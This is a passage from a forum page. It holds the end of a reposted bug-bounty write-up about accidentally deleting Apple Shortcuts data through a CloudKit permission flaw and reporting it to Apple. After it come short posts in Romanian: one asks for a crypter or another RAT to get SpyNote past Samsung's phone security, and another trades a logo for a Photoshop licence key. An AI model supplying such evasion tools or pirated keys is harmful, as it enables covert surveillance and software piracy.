I’ve tested it all and I started to continue looking into other things related to Apple Shortcuts. Suddenly one my shared shortcuts gave a 404: But I just shared it? I quit the Shortcuts app and started it again: Shit. I went to one of the websites sharing a bunch of shortcuts and used my phone to test one: All of them were gone. I know realized that the deletion did somehow work, but that the _defaultZone never disappeared. When I tried sharing a new shortcut it also did not work, at least not to begin with, most likely due to the record types also being deleted. At 23 Mar 2021 20:44:00 GMT I wrote the following email to Apple Security: I explained the situation and confirmed I understood the severity. I also explained the steps I took to avoid causing any service interruptions, since I knew that was against the Apple Security Bounty policy. I explained that creation of zones was indeed possible, but that I did not know if that confirmed that I could also delete zones. Another argument why it was hard to find this bug was that the container made by my other Apple developer account wasn’t vulnerable. Also, the error when trying to delete metadata_zone confirmed that there were indeed permission checks in place. The bug seemed to only allow the _defaultZone to be deleted by anyone on Apple-owned CloudKit containers. I decided to use the case of “I am able to create a zone” as an indicator that this bug existed in other containers owned by Apple. This would show Apple the scope of the issue without me causing any more harm. I was already panicking. Apart from com.apple.shortcuts, the list consisted of 30 more containers with the same issue. I still wasn’t sure if creating a new zone in the public scope did actually prove the ability to delete the default zone, but that’s the closest I got to verifying the issue. Also, the other containers might not have been using the public scope at all and I never confirmed the bug on the other scopes. Apple’s first response came early the morning after: Public response I acknowledged the email and started to see on Twitter that this was in fact affecting a lot of people: There were also some suspicions that this was indeed a move by Apple due to a podcast discussion about using the API to fetch Shortcuts data. A podcast called “Connected” had a discussion on the issue and tried to explain what had happened (Between 26:50 to 40:22). One individual was actually 100% correct identifying the minute of my accidental deletion call: Apple’s response Apple was quite silent after the first request to me to stop testing. They did go public and explain to people that the issue was going to be solved: It took a few days for all data to recover. One other individual shared my assumption on why that was: On April 1st Apple gave the following reply: During the hold out period, I followed up their email again clarifying the steps I took to prevent any service interruption, and tried to explain how limited I was to confirm if the deletion call had worked or not. I also asked them if the creation of a zone was a good indicator of the bug. I got back another response clarifying that creation of a zone was indeed a valid non-destructive way to confirm invalid security controls: I then confirmed that I could not do any of the zone modifications anymore. CloudKit Developer portal was later moved to use the API on api.apple-cloudkit.com instead. Conclusion Approaching CloudKit for bugs turned out to be a lot of fun, a bit scary, and a really good example of what a real deep-dive into one technology can result in when hunting bugs. The Apple Security team was incredibly helpful and professional throughout the process of reporting these issues. Even though the last bug caused an incident, I really tried to explain all my steps to prevent that from happening. The Apple Security Bounty program decided to award $12,000, $24,000 and $28,000, respectively, for the bugs mentioned in this post. Source: https://labs.detectify.com/2021/09/13/hacking-cloudkit-how-i-accidentally-deleted-your-apple-shortcuts/
    2 points
  3. Salut, sunt destul de nou in domeniu, am niste experienta cu C# si am spynote pe PC. Vreau sa-mi pun RAT in telefonul samsung si nu reusesc sa trec de Samsung Security. Are cineva un crypter sau un alt RAT?
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  4. Iti fac eu logo, pt key, dar cer in schimb un key pentru Photoshop, sau Adobe Ilustrator
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